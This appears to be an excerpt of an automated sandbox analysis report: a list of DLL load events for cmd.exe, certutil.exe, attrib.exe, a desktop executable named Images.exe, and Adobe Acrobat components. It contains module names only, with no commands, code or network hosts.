Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: servicingcommon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appidapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appidapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appidapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appidapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appidapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cfgmgr32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: virtdisk.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: servicingcommon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appidapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appidapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appidapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appidapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appidapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appidapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cfgmgr32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: virtdisk.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: servicingcommon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appidapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appidapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appidapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cfgmgr32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: virtdisk.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: servicingcommon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appidapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: appidapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Images.exe	Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\Images.exe	Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\Images.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Images.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Images.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Images.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Images.exe	Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Images.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Images.exe	Section loaded: cfgmgr32.dll
Source: C:\Users\user\Desktop\Images.exe	Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Images.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Images.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Images.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Images.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Section loaded: vccorlib140.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Section loaded: appcontracts.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: version.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: wininet.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: credui.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: profapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: libcef.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: dbghelp.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: winmm.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: dxgi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: propsys.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: uiautomationcore.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: oleacc.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: secur32.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: userenv.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: netapi32.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: wtsapi32.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: hid.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: chrome_elf.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: dwrite.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: dwmapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: ncrypt.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: usp10.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: d3d9.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: dxva2.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: winhttp.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: wevtapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: cryptui.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: esent.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: netutils.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: netutils.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: dxcore.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: dsrole.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: wkscli.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: samcli.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: msasn1.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: ntasn1.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: powrprof.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: umpdc.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: dpapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: nlansp_c.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: textinputframework.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: mmdevapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: devobj.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: cfgmgr32.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: cfgmgr32.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: cfgmgr32.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: winsta.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: windows.ui.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: mscms.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: mdmregistration.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: mdmregistration.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: msvcp110_win.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: omadmapi.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: dsreg.dll
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Section loaded: apphelp.dll
